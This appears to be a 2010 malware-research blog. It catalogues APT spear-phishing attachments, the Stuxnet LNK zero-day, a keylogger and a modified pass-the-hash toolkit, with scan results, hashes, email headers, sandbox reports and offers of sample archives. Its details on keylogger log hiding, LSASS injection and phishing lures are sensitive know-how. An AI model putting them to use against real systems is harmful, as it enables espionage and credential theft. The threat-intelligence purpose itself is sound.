Friday, July 30, 2010

CVE-2010-2568 keylogger Win32/Chymine.A

 CVE-2010-2568 - Win32/Chymine.A 
Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems

The credit for this post goes to Extraexploit from See additional details on his blog

Download bin.exe as a password protected archive  (contact me if you need the password)

ESET New malicious LNKs: here we go…
"At the time of analysis, this threat downloads and install a key stroke logger which we detect as Win32/Spy.Agent.NSO trojan.  The server used to deliver the components used in this attack is presently located in the US, but the IP is assigned to a customer in China. "

F-Secure Win32/Chymine-A

Result: 30/41 (73.18%)
Antivirus Version Last Update Result
AhnLab-V3 2010.07.30.00 2010.07.29 Dropper/Win32.Chymine
AntiVir 2010.07.30 TR/Dldr.Tiny.cmq
Antiy-AVL 2010.07.30 Trojan/Win32.Tiny.gen
Avast 4.8.1351.0 2010.07.30 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.30 Win32:Malware-gen
AVG 2010.07.30 PSW.Generic8.GRF
BitDefender 7.2 2010.07.30 Trojan.Autorun.ATB
Comodo 5586 2010.07.30 TrojWare.Win32.AntiAV.~G
DrWeb 2010.07.30 Trojan.KeyLogger.8141
Emsisoft 2010.07.30 Trojan-Downloader.Win32.Tiny!IK
F-Secure 9.0.15370.0 2010.07.30 Trojan-Spy:W32/Chymine.A
Fortinet 2010.07.30 W32/Tiny.CMQ!tr.dldr
GData 21 2010.07.30 Trojan.Autorun.ATB
Ikarus T3. 2010.07.30 Trojan-Downloader.Win32.Tiny
Jiangmin 13.0.900 2010.07.29 TrojanSpy.KeyLogger.cqyg
Kaspersky 2010.07.30 Trojan-Downloader.Win32.Tiny.cmq
McAfee 5.400.0.1158 2010.07.30 Generic Downloader.x!eas
McAfee-GW-Edition 2010.1 2010.07.30 Heuristic.BehavesLike.Win32.CodeInjection.H
Microsoft 1.6004 2010.07.30 Trojan:Win32/Chymine.A
NOD32 5325 2010.07.30 Win32/Spy.Agent.NSO
nProtect 2010-07-30.02 2010.07.30 Trojan.Autorun.ATB
Panda 2010.07.29 Trj/ChymineLNK.A
PCTools 2010.07.30 Net-Worm.SillyFDC
Rising 2010.07.30 Trojan.Win32.Generic.52214029
Sophos 4.56.0 2010.07.30 Mal/Chymin-A
Sunbelt 6663 2010.07.30 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.07.30 W32.SillyFDC
VBA32 2010.07.30 Trojan-Downloader.Tiny.cmq
ViRobot 2010.7.30.3963 2010.07.30 Trojan.Win32.S.Downloader.131584
VirusBuster 2010.07.29 Trojan.DL.Tiny.DPT
Additional information
File size: 131584 bytes
MD5...: 3515b1f2ae991fcd64ff4e3b664625c0

Thursday, July 29, 2010

Jul 29 CVE-2010-0188 PDF Defense New Thinks

CVE-2010-0188 Unspecified vulnerability in Adobe Reader and Acrobat 8.x before 8.2.1 and 9.x before 9.3.1 allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors

Download  5e0e5951ca4626a891344e38e0085d58 Defense_Attache.pdf  as a password protected archive (please contact me for the password if you need it)

From: Gillian Medina []
Sent: Thursday, July 29, 2010 4:31 AM
Subject: Defense New Thinks

Defense New Thinks 

  File Defense_Attache.pdf received on 2010.08.02 03:25:36 (UTC)
Result: 11/42 (26.2%)
Antiy-AVL    2010.08.02    Exploit/Win32.Pidief
Avast    4.8.1351.0    2010.08.02    PDF:CVE-2010-0188
Avast5    5.0.332.0    2010.08.02    PDF:CVE-2010-0188
DrWeb    2010.08.02    Exploit.PDF.1046
eTrust-Vet    36.1.7753    2010.07.31    PDF/CVE-2010-0188!exploit
GData    21    2010.08.02    PDF:CVE-2010-0188
Ikarus    T3.    2010.08.02    Exploit.Win32.Pidief
Kaspersky    2010.08.02    Exploit.Win32.Pidief.dci
McAfee-GW-Edition    2010.1    2010.08.01    Heuristic.BehavesLike.PDF.Suspicious.L
NOD32    5331    2010.08.01    a variant of PDF/CVE-2010-0188
Sophos    4.56.0    2010.08.02    Troj/PDFJs-II
Additional information
File size: 73708 bytes
MD5...: 5e0e5951ca4626a891344e38e0085d58

Received: from SNT133-W12 ([]) by with Microsoft SMTPSVC(6.0.3790.4675);
     Thu, 29 Jul 2010 01:31:18 -0700
Content-Type: multipart/mixed;
X-Originating-IP: []
From: Gillian Medina
Subject: Defense New Thinks
Date: Thu, 29 Jul 2010 01:31:18 -0700
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 29 Jul 2010 08:31:18.0425 (UTC) FILETIME=[6A87E890:01CB2EF8]

ISP:    China Unicom Liaoning province network
Organization:    China Unicom Liaoning province network
Type:    Broadband
Assignment:    Static IP
State/Region:    Liaoning
City:    Shenyang

This IP is on many blacklists

Wednesday, July 28, 2010

Jul 28 CVE-2009-4324 PDF 990729 Summary of Network Intelligence from

 Download 738af108a6edd46536492b1782589a04 -990729.pdf as a password protected archive (contact me if you need the password)

From: ljw []
Sent: Wednesday, July 28, 2010 11:24 PM
Subject: 990729網情彙編

 From: ljw [mailto:]Sent: Wednesday, July 28, 2010 11:24 PMTo: 990729  Summary of Network Intelligence


Received: from (HELO (
Received: from
    by with Mail2000 ESMTP Server V4.00S(4662:0:AUTH_LOGIN)
    (envelope-from ); Thu, 29 Jul 2010 17:28:08 +0800 (CST)
Message-ID: <1975e5623c$23fce32a$0ae1d8b4@nccu212af2ce2>
From: "ljw"
To: ,
Subject: =?big5?B?OTkwNzI5uvSxobdKvXM=?=
Date: Thu, 29 Jul 2010 11:24:22 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
ISP:    GSN, Taiwan Government Service Network.
Organization:    Taichung City Government
Country:    Taiwan

File name:
Submission date:
2010-07-30 05:36:27 (UTC)
12 /42 (28.6%)
Authentium     2010.07.30     JS/Pdfka.V
Avast     4.8.1351.0     2010.07.30     JS:Pdfka-gen
Avast5     5.0.332.0     2010.07.30     JS:Pdfka-gen
AVG     2010.07.29     Exploit.PDF
BitDefender     7.2     2010.07.30     Exploit.PDF-JS.Gen
eTrust-Vet     36.1.7750     2010.07.30     PDF/CVE-2010-1297.B!exploit  - NOT
F-Prot     2010.07.30     JS/Pdfka.V
F-Secure     9.0.15370.0     2010.07.30     Exploit.PDF-JS.Gen
GData     21     2010.07.30     Exploit.PDF-JS.Gen
McAfee-GW-Edition     2010.1     2010.07.29     Heuristic.BehavesLike.PDF.Suspicious.O
Norman     6.05.11     2010.07.29     JS/Shellcode.IZ
nProtect     2010-07-30.01     2010.07.30     Exploit.PDF-JS.Gen
Additional information
Show all
MD5   : 738af108a6edd46536492b1782589a04

Windows XP SP2 Adobe Reader 9.1

Files created


AntiVir 2010.08.25 BDS/Ixeshe.A.20
Authentium 2010.08.26 W32/Heuristic-245!Eldorado
Avast 4.8.1351.0 2010.08.25 Win32:Rootkit-gen
Avast5 5.0.594.0 2010.08.25 Win32:Rootkit-gen
BitDefender 7.2 2010.08.26 Trojan.Generic.4549982
CAT-QuickHeal 11.00 2010.08.24 Backdoor.Ixeshe.a
ClamAV 2010.08.26 PUA.Packed.ASPack
Emsisoft 2010.08.26 Backdoor.Win32.Ixeshe!IK
F-Prot 2010.08.26 W32/Heuristic-245!Eldorado
F-Secure 9.0.15370.0 2010.08.26 Trojan.Generic.4549982
Fortinet 2010.08.25 W32/PdfExDr.B!tr
GData 21 2010.08.26 Trojan.Generic.4549982
Ikarus T3. 2010.08.26 Backdoor.Win32.Ixeshe
Microsoft 1.6103 2010.08.25 Backdoor:Win32/Ixeshe.A
NOD32 5397 2010.08.25 probably a variant of Win32/Ixeshe.A
nProtect 2010-08-25.02 2010.08.25 Trojan.Generic.4549982
Panda 2010.08.25 Trj/CI.A
PCTools 2010.08.26 Trojan.Gen
Sophos 4.56.0 2010.08.26 Mal/PdfExDr-B
Sunbelt 6795 2010.08.26 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.08.26 Trojan.Gen
TrendMicro 2010.08.26 TSPY_AGENT.AVEP
TrendMicro-HouseCall 2010.08.26 TSPY_AGENT.AVEP
VBA32 2010.08.25 Trojan-Downloader.Dreamtouch.xb
VirusBuster 2010.08.25 Trojan.Ixeshe.Z
Additional informationShow all 
MD5   : d27e5643f1e5422be6cba2d98506ebbf
ISP:    Ministry of Education Computer Center
Organization:    Ministry of Education Computer Center
Country:    Taiwan

  • Outgoing Connections

    • HTTP Data

      • Method: GET
      • Url:
      • HTTP Version: HTTP/1.1

        • Header Data

          • x_bigfix_client_string: 2al314Le1g0315QgjaZ/qDAA
          • User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
          • Host:
          • Connection: Keep-Alive

Incoming mail for is handled by one mail server at has one IP number ( , but the reverse is point to the same IP. use this as a mail server. is a domain controlled by three name servers at Two of them are on the same IP network. The primary name server is Incoming mail for is handled by one mail server at has one IP number (

More information is hosted on a server in Taiwan

Transport Protocol: TCP
Remote Address:
Remote Port: 80
Protocol: HTTP
Connection Established: 0
Socket: 2020

ISP:    National Taiwan University
    Organization:    National Taiwan University
    Country:    Taiwan

Tuesday, July 27, 2010

APT Activity Monitor / keylogger

Here is a small piece of APT type malware, which records all user activities and keystrokes, including passwords. The attacker needs to execute it and it will create a hidden folder in the same directory named mssvr and a text log file called Updaterinfo.dat. The log can be sent or downloaded later using other means (look for a file named send1.exe, for example  - never mind, send1.exe does not appear to have any sending abilities). There are usually many other files associated with the attack - backdoors, misc installers, command interpreters, etc.  The Anubis report is brief and clear - see it posted below in full. The binary and mssvr folder can be anywhere, in some temp folder, for example.
mssvr\UpdaterInfo.dat ]

Fixed the archive, re-download it if you could not open it before
Download  dc281590aa9153000e983622f0559ea1 Adobeinfo.exe  ac as a password protected archive (please contact me for the password if you need it)
Two name variants known (but there can be an endless list) are Adobeinfo.exe and lognoreg.exe.

 File AdobeInfo.exe received on 2010.07.25 05:11:45 (UTC)
Current status: finished
Result: 0/42 (0.00%)
Additional information
File size: 16384 bytes
MD5   : dc281590aa9153000e983622f0559ea1

Example of a log UpdaterInfo.dat in mssvr folder, note the way passwords are captured - in the bottom of this log.

--- 20100727 13:07:47 ----------------
11:06:47 The Active Windows Title: PC21330
11:06:03 The Active Windows Title: Inbox - Microsoft Outlook
11:06:05 The Active Windows Title: RE: Meeting tomorrow : Budget 2011- Message (HTML)
Let's meet before the meeting, maybe around 3 pm today. By the way I am still waiting for Brian's reply, he never called me back, do you have his secretary's number?

11:06:48 The Active Windows Title: Microsoft Access - Events_Records : Database (Access 2000 file format)
I will send you the agenda in a minute
11:06:55 The Active Windows Title: Find and Replace
July 23
11:06:07 The Active Windows Title: Find and Replace
12:06:37 The Active Windows Title: Microsoft Excel - InvitationListDetails.xlsx
12:06:06 The Active Windows Title: Microsoft Excel - invoicelist.xlsx
12:06:10 The Active Windows Title: Microsoft Excel - invoicelist.xlsx.xlsx
12:06:11 The Active Windows Title: Save As
12:06:15 The Active Windows Title: Microsoft Excel - InvidtationListDetails
12:06:56 The Active Windows Title: \\FILESRV002\DATA\DEPARTMENTS\STRATCMD-S
12:06:27 The Active Windows Title: Windows Internet Explorer
Taxi 20006
12:06:52 The Active Windows Title: taxi phone number zip code 20001 - Google Search - Microsoft Internet Explorer
12:06:04 The Active Windows Title: @@To Do list - Microsoft Outlook
oil production
12:06:10 The Active Windows Title: Untitled - Message (Plain Text)
12:06:16 The Active Windows Title: Amanda Smith
12:06:56 The Active Windows Title: Untitled - Message (Plain Text)
15:06:36 The Active Windows Title: Google - Microsoft Internet Explorer

Or this is from a VM

Some strings

[Num Lock]
[Scroll Lock]
[Print Screen]
---- %04d%02d%02d %02d:%02d:%02d ----------------
The Active Windows Title: %s

Unicode Strings:

Anubis Report

    2. AdobeInfo..exe
    General information about this executable
        Analysis Reason: Primary Analysis Subject
        Filename:        AdobeInfo..exe
        MD5:             dc281590aa9153000e983622f0559ea1
        SHA-1:           9945f8bf55a81b0e201fad167577d49b37079bd4
        File Size:       16384 Bytes
        Command Line:    "C:\AdobeInfo..exe" 
        at analysis end: alive
        Exit Code:       0

    Load-time Dlls
        Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
               Base Address: [0x7C900000 ], Size: [0x000AF000 ]
        Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
               Base Address: [0x7C800000 ], Size: [0x000F6000 ]
        Module Name: [ C:\WINDOWS\system32\USER32.dll ],
               Base Address: [0x7E410000 ], Size: [0x00091000 ]
        Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
               Base Address: [0x77F10000 ], Size: [0x00049000 ]
        Module Name: [ C:\WINDOWS\system32\MSVCRT.dll ],
               Base Address: [0x77C10000 ], Size: [0x00058000 ]

    2.a) AdobeInfo..exe - Registry Activities
    Registry Values Read:
        Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ], 
             Value Name: [ TSAppCompat ], Value: [ 0 ], 2 times

    2.b) AdobeInfo..exe - File Activities
    Files Created:
        File Name: [ C:\mssvr ]
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

    Files Read:
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

    Files Modified:
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

    Directories Created:
        Directory: [ C:\\mssvr ]

    2.c) AdobeInfo..exe - Other Activities
    Keyboard Keys Monitored:
        Virtual Key Code: [ VK_SHIFT (16) ], 70585 times
        Virtual Key Code: [ VK_BACK (8) ], 743 times
        Virtual Key Code: [ VK_RETURN (13) ], 743 times
        Virtual Key Code: [ VK_ESCAPE (27) ], 743 times
        Virtual Key Code: [ VK_F1 (112) ], 743 times
        Virtual Key Code: [ VK_F2 (113) ], 743 times
        Virtual Key Code: [ VK_F3 (114) ], 743 times
        Virtual Key Code: [ VK_F4 (115) ], 743 times
        Virtual Key Code: [ VK_F5 (116) ], 743 times
        Virtual Key Code: [ VK_F6 (117) ], 743 times
        Virtual Key Code: [ VK_F7 (118) ], 743 times
        Virtual Key Code: [ VK_F8 (119) ], 743 times
        Virtual Key Code: [ VK_F9 (120) ], 743 times
        Virtual Key Code: [ VK_F10 (121) ], 743 times
        Virtual Key Code: [ VK_F11 (122) ], 743 times
        Virtual Key Code: [ VK_F12 (123) ], 743 times
        Virtual Key Code: [ VK_OEM_3 (192) ], 743 times
        Virtual Key Code: [ VK_1 (49) ], 743 times
        Virtual Key Code: [ VK_2 (50) ], 743 times 

Saturday, July 24, 2010

Advanced Persistent Threat / Targeted Attacks / APT Malware links

Here is a collection of links about  Advanced Persistent Threat malware and attacks. I think I missed a few hundred, please send more. thanks, Mila

Specific malware families and trojans
Stuxnet, Duqu, Flame, Gauss ..

OLD(ER) 2010 and before

SHADOWS IN THE CLOUD: Investigating Cyber Espionage 2.0 Report
Shadows in the Cloud: An investigation into cyber espionage 2.0
Cyber Espionage: Death by 1000 Cuts

The Advanced Persistent Threat (or Informatonized Force Operatons) Michael K. Daly

Combat the APT by Sharing Indicators of Compromise
Malware Behaving Badly: Preview

Blackhat Europe, State Of Malware: Family Ties

Advanced Persistent Threat Report

The Hackers Behind Stuxnet  Patrick Fitzgerald

SANS computer forensics
Security Intelligence: Introduction (pt 1)
Security Intelligence: Introduction (pt 2)
Security Intelligence: Attacking the Kill Chain
Security Intelligence: Defining APT Campaigns

Digital Bond
Trojan Targeting Siemens and APT Thoughts  Dale Peterson   IT--Harvest
35 Steps to Protect Yourself from Cyber Espionage Richard Stiennon

Project Grey Goose
Project Grey Goose: Phase I ReportProject Grey Goose Phase II Report: The evolving state of cyber warfare

Information Security
Understanding the advanced persistent threat Richard Bejtlich 

HBGary, Inc.
Advanced Persistent Threat What APT Means to Your Enterprise Greg Hoglund

Cassandra Security
All Advanced Persistent Threat articles

All Advanced Persistent Threat articles 

A new approach to China 

You Down with APT? Richard Bejtlich
All Advanced Persistent Threat articles

Johnny Cocaine Internet Cowboy
Losing the cyberwar

MadMark's Blog
Google / Adobe Hacking Event Follow-up – APT Malware

ViCheck Malware Trends
APT Malware Trends

Advanced Persistent Threat (APT)

Infowar Monitor
All Articles about espionage

Lab Matters: Inside Targeted Attacks

Trojan Hydraq exposed



Wednesday, July 21, 2010

Jul 15 CVE-2009-0556 PPT North Korean Nuclear Update from

Download  Nuclear_report.pps 71803d893ed7d052fdb58f10da200fe9 as a password protected archive (contact me if you need the password)

From: David Alton []
Sent: Thursday, July 15, 2010 4:03 AM
To: xxxxxxxxxx
Subject: North Korean Nuclear Update.

Recently U.S Secretary of State Hillary Clinton has said North
Korea as many as six nuclear weapons.
Attached please find Koreatimes`s article about North Korea`s
Nuclear issue...   I believe it could be of your interest and helpful for reviewing
the NK Nuclear activities.
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.

 File Nuclear_report.pps received on 2010.07.21 11:33:22 (UTC)
Result: 11/42 (26.2%)
BitDefender    7.2    2010.07.21    Exploit.PPT.Gen
Emsisoft    2010.07.21    Exploit.MSPPoint.Agent!IK
F-Secure    9.0.15370.0    2010.07.21    Exploit.PPT.Gen
GData    21    2010.07.21    Exploit.PPT.Gen
Ikarus    T3.    2010.07.21    Exploit.MSPPoint.Agent
Kaspersky    2010.07.21    Exploit.MSPPoint.Agent.x
McAfee-GW-Edition    2010.1    2010.07.21    Heuristic.BehavesLike.Exploit.P97.CodeExec.PGPG
Norman    6.05.11    2010.07.20    ShellCode.D
nProtect    2010-07-21.01    2010.07.21    Exploit.PPT.Gen
Sophos    4.55.0    2010.07.21    Troj/ExpPPT-A
TrendMicro-HouseCall    2010.07.21    HEUR_OLEXP.B
Additional information
File size: 838144 bytes
MD5...: 71803d893ed7d052fdb58f10da200fe9

X-Originating-IP: []
From: David Alton
To: xxxxxxxxxxxx
Subject: North Korean Nuclear Update.
Date: Thu, 15 Jul 2010 20:03:21 +1200
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 15 Jul 2010 08:03:21.0286 (UTC) FILETIME=[31184E60:01CB23F4]

ISP:    City Telecom (H.K.) Ltd.
Organization:    City Telecom (H.K.) Ltd.
Type:    Broadband
Assignment:    Static IP
Country:    Hong Kong hk flag
City:    Tin Shui Wai

Sunday, July 18, 2010

CVE-2010-2568 (LNK vunerability) Zero Day Stuxnet-A Sample + PoC by Ivanlef0u + Links

CVE-2010-2568  -- Reserved --
Microsoft Security Advisory (2286198) Microsoft is investigating reports of limited, targeted attacks exploiting a vulnerability in Windows Shell, a component of Microsoft Windows. This advisory contains information about which versions of Windows are vulnerable as well as workarounds and mitigations for this issue.
The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited. For Windows 7 systems, AutoPlay functionality for removable disks is automatically disabled.

Download 74ddc49a7c121a61b8d06c03f92d0c13 Stuxnet-A ac as a password protected archive (please contact me for the password if you need it)

Collection of links (in no particular order)
  1. Ivanlef0u's Blog CVE-2010-2568 shorcut Lnk + PoC (Google translated to English)
  2. Exploitdb Microsoft Windows Automatic LNK Shortcut File Code Execution (PoC by Ivanf0u)
  3. Microsoft Security Advisory (2286198) Vulnerability in Windows Shell Could Allow Remote Code Execution
  4. Brian Krebs Experts Warn of New Windows Shortcut Flaw
  5. InReverse  About TmpHider/Stuxnet #1 by swirl
  6. Wilders Security Forums - Rootkit.TmpHider
  7. Microsoft Malware Protection Center - The Stuxnet Sting
  8. Microsoft Malware Protection Center - WinNT/Stuxnet.A
  9. Threatexpert - Win32/Stuxnet.A
  10. ESET (Windows) Shellshocked, Or Why Win32/Stuxnet Sux… by David Harley (with special thanks to Juraj Malcho, Aleksander Matrosov and their colleagues)
  11. Aleksander Matrosov "Rootkit.TmpHider is signed with signature of Realtek Corp"" /via @_MDL_ 
  12. Sophos Windows shortcut vulnerability with rootkit - detailed video demo 
  13. Mitigating .LNK Exploitation With Ariad — Didier Stevens 
  14. Internet Storm Center Vulnerability in Windows "LNK" files?  by Joel Esler and Bojan
  15. Windows zero-day attack works on all Windows systems by Chester Wisniewski
  16. Stuxnet is a directed attack -- 'hack of the century' by Ralph Langner (new)

 From Threatexpert
  * The following files were created in the system:
#    Filename(s)    File Size    File Hash    Alias
1     %Windir%\inf\mdmcpq3.PNF     6,623 bytes     

MD5: 0x0DD2AF5AFE93118073CB656D813435A4
SHA-1: 0x256AC5228427FCD03FB9EC1871B15FD76E4D0879     (not available)

2     %Windir%\inf\mdmeric3.PNF     90 bytes    

SHA-1: 0xF7B86531AD78EB283E59091A1C64B0C47D50E6C6     (not available)

3     %Windir%\inf\oem6C.PNF     323,848 bytes    

MD5: 0xFA4381DF1F7F89077439A596630D5647
SHA-1: 0x152B6830777E7F2B214708A21BA28F9D625E5E16     (not available)

4     %Windir%\inf\oem7A.PNF     498,176 bytes     

SHA-1: 0xBCFCC25C6D0F58D784D5B5A4C631E920F655F50E     (not available)

5     %System%\drivers\mrxcls.sys     26,616 bytes    

MD5: 0xF8153747BAE8B4AE48837EE17172151E
SHA-1: 0xCB0793029C60C0BD059FF85DE956619F7FDEB4FD     Trojan:WinNT/Stuxnet.A [Microsoft]

6     %System%\drivers\mrxnet.sys     17,400 bytes     

MD5: 0xCC1DB5360109DE3B857654297D262CA1
SHA-1: 0x758240613C362BB1FD13E07D3D19F357B7F8A6DA     Trojan:WinNT/Stuxnet.B [Microsoft]

7     [file and pathname of the sample #1]     517,632 bytes    

MD5: 0x74DDC49A7C121A61B8D06C03F92D0C13
SHA-1: 0x0CCBC128DD8BF73DC7B3922FB67D26BBCDBCAA89     Trojan.Gen [PCTools]
Trojan.Gen [Symantec]
TrojanDropper:Win32/Stuxnet.A [Microsoft]

016169ebebf1cec2aad6c7f0d0ee9026  received on 2010.07.16 11:55:58 (UTC)
Result: 25/41 (60.98%)
a-squared     2010.07.16     Trojan-Dropper.Win32.Stuxnet!IK
AhnLab-V3     2010.07.16.00     2010.07.15     Dropper/Win32.Stuxnet
AntiVir     2010.07.16     TR/Drop.Stuxnet.D
Avast     4.8.1351.0     2010.07.16     Win32:Trojan-gen
Avast5     5.0.332.0     2010.07.16     Win32:Trojan-gen
AVG     2010.07.16     SHeur3.XLI
BitDefender     7.2     2010.07.16     Win32.Worm.Stuxnet.A
Comodo     5446     2010.07.16     TrojWare.Win32.Rootkit.Stuxnet.a
DrWeb     2010.07.16     Trojan.Stuxnet.1
F-Secure     9.0.15370.0     2010.07.16     Trojan.Agent.AQCK
GData     21     2010.07.16     Win32.Worm.Stuxnet.A
Ikarus     T3.     2010.07.16     Trojan-Dropper.Win32.Stuxnet
Kaspersky     2010.07.16     Trojan-Dropper.Win32.Stuxnet.d
McAfee     5.400.0.1158     2010.07.16     Stuxnet
McAfee-GW-Edition     2010.1     2010.07.16     Heuristic.LooksLike.Win32.NewMalware.B
Microsoft     1.6004     2010.07.16     TrojanDropper:Win32/Stuxnet.A
NOD32     5283     2010.07.16     Win32/Stuxnet.A
nProtect     2010-07-16.01     2010.07.16     Trojan.Agent.AQCK
PCTools     2010.07.16     Rootkit.Stuxnet
Prevx     3.0     2010.07.16     Medium Risk Malware
Sophos     4.55.0     2010.07.16     Troj/Stuxnet-A
Sunbelt     6591     2010.07.16     Trojan.Win32.Generic!BT
Symantec     20101.1.1.7     2010.07.16     Trojan.Gen
VBA32     2010.07.16     Trojan-Spy.0485
VirusBuster     2010.07.16     Trojan.DR.Stuxnet.C
Additional information
File size: 517632 bytes
MD5   : 74ddc49a7c121a61b8d06c03f92d0c13

 Microsoft Malware Protection Center
      Win32/PcClient.ACH (CA)

Alert Level (?) Severe
Released: Jul 07, 2010
Trojan:WinNT/Stuxnet.A is a trojan component installed by TrojanDropper:Win32/Stuxnet.A that injects code into the running process LSASS.EXE.

System changes
The following system changes may indicate the presence of this malware:

      The presence of the following files:
      The presence of the following registry keys:

Technical Information (Analysis)
Trojan:WinNT/Stuxnet.A is a trojan component installed by TrojanDropper:Win32/Stuxnet.A that injects code into the running process LSASS.EXE.
Trojan:WinNT/Stuxnet.A may be present as the following file:


Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.

The trojan component runs as a hidden service named "MRXCLS" via a registry modification as in the following example:

Sets value: "Description"
With data: "MRXCLS"
Sets value: "DisplayName"
With data: "MRXCLS"
Sets value: "ErrorControl"
With data: "0"
Sets value: "Group"
With data: "Network"
Sets value: "ImagePath"
With data: "\??\%windir%\system32\Drivers\mrxcls.sys"
Sets value: "Start"
With data: "1"
Sets value: "Type"
With data: "1"
Sets value: "Data"
With data: ""
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\MRxCls
Injects code
Trojan:WinNT/Stuxnet.A is capable of injecting malicious code into the running process "LSASS.EXE" based on data written in the registry or from other TrojanDropper:Win32/Stuxnet.A components such as the following:


Analysis by Francis Allan Tan Seng 

Friday, July 16, 2010

APT malware #2. Anatomy of a mail / data theft attack. (wiam.exe and others)

These days I see a spike in the number of searches for WIAM.EXE, which is listed as one of the file available for download upon request. I thought I would add a few more details on this file and files associated with it.

While there can be any kind of file named wiam.exe, chances are that your file is similar or identical to the one described below. This file is part malware kind frequently referred to as APT malware. If you find this file on a system, look for others listed below. And yes, as you already guessed, you have a Problem.

According to Mandiant 
"The Advanced Persistent Threat (APT) is a sophisticated and organized cyber attack to access and steal information from compromised computers. The intruders responsible for the APT attacks target the Defense Industrial Base (DIB), financial industry, manufacturing industry, and research industry. The attacks used by the APT intruders are not very different from any other intruder. The main differentiator is the APT intruder’s perseverance and resources. They have malicious code (malware) that circumvents common safeguards such as anti-virus and they tend to generate more activity than wanton “drive by hacks” on the Internet. The intruders also escalate their tools and techniques as a victim firm’s capability to respond improves. Therefore, the APT attacks present different challenges than addressing common computer security breaches."
Download all malware files mentioned below as a password protected archive (contact me if you need the password)
Download additional files mentioned in the update July 16, 2010

 Update: scroll down to see recent additions marked  Update July 16, 2010
1. wiam.exe + iam.dll  
The file itself is not really a trojan but a cli tool, part of the modified pass-the-hash toolkit (PSH toolkit) released by Core Technologies.
"The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!)" See Modifying Windows NT Logon Credential
PSH original toolkit files
File: iam.exe  Size: 90112 MD5:  1FF020D6F41CBF73ADF3AF2DE9A08CFD
File: iamdll.dll  Size: 49152  MD5:  DAB43935D17725024CC5EF2DD35CBEDD
 File iam.exe received on 2010.06.07 17:06:26 (UTC)
Result: 5/41 (12.2%)
Authentium    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Prot    2010.06.07    W32/Heuristic-KPP!Eldorado
Panda    2010.06.06    Suspicious file
PCTools    2010.06.07    Hacktool.PTHToolkit
Symantec    20101.1.0.89    2010.06.07    Hacktool.PTHToolkit
File size: 90112 bytes
MD5...: 1ff020d6f41cbf73adf3af2de9a08cfd

File iamdll.dll received on 2010.06.07 17:26:26 (UTC)
Result: 0/41 (0%)
Additional information
File size: 49152 bytes
MD5...: dab43935d17725024cc5ef2dd35cbedd

Modified kit
File: wiam.exe  Size: 40960  MD5:  F49CB9A7006FB34E5B5A81AE32358C77
File: iam.dll   Size: 36864  MD5:  30D50F856EFE9BCF7D0A859154CB2F92
 File wiam.exe received on 2010.06.07 17:07:40 (UTC)
Result: 22/41 (53.66%) 
a-squared    2010.06.07    Trojan.Hijacker!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Malware/Win32.Trojan Horse
AntiVir    2010.06.07    TR/Hijacker.Gen
Authentium    2010.06.07    W32/Heuristic-KPP!Eldorado
Avast    4.8.1351.0    2010.06.07    Win32:Trojan-gen
Avast5    5.0.332.0    2010.06.07    Win32:Trojan-gen
BitDefender    7.2    2010.06.07    Application.Generic.248976
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5019    2010.06.07    UnclassifiedMalware
eSafe    2010.06.06    Win32.TRHijacker
F-Prot    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Secure    9.0.15370.0    2010.06.07    Application.Generic.248976
GData    21    2010.06.07    Application.Generic.248976
Ikarus    T3.    2010.06.07    Trojan.Hijacker
McAfee    5.400.0.1158    2010.06.07    Generic.dx!mfu
McAfee-GW-Edition    2010.1    2010.06.07    Generic.dx!mfu
NOD32    5180    2010.06.07    probably a variant of Win32/Agent
Panda    2010.06.06    Trj/CI.A
PCTools    2010.06.07    Trojan.Generic
Sunbelt    6416    2010.06.07    Trojan.Win32.Generic!BT
Symantec    20101.1.0.89    2010.06.07    Trojan Horse
VirusBuster    2010.06.07    Trojan.Hijacker.BUO
Additional information
File size: 40960 bytes
MD5...: f49cb9a7006fb34e5b5a81ae32358c77

File iam.dll received on 2010.06.07 17:22:42 (UTC)
Result: 0/41 (0%)
Additional information
File size: 36864 bytes
MD5...: 30d50f856efe9bcf7d0a859154cb2f92

 You can compare them in a hex editor, the files are not identical but here are similarities in the strings.

iam.exe file from Core

wiam.exe strings (partial, just for comparison)

The files can be found in various subdirectories of

\%userprofle%\local settings\temp

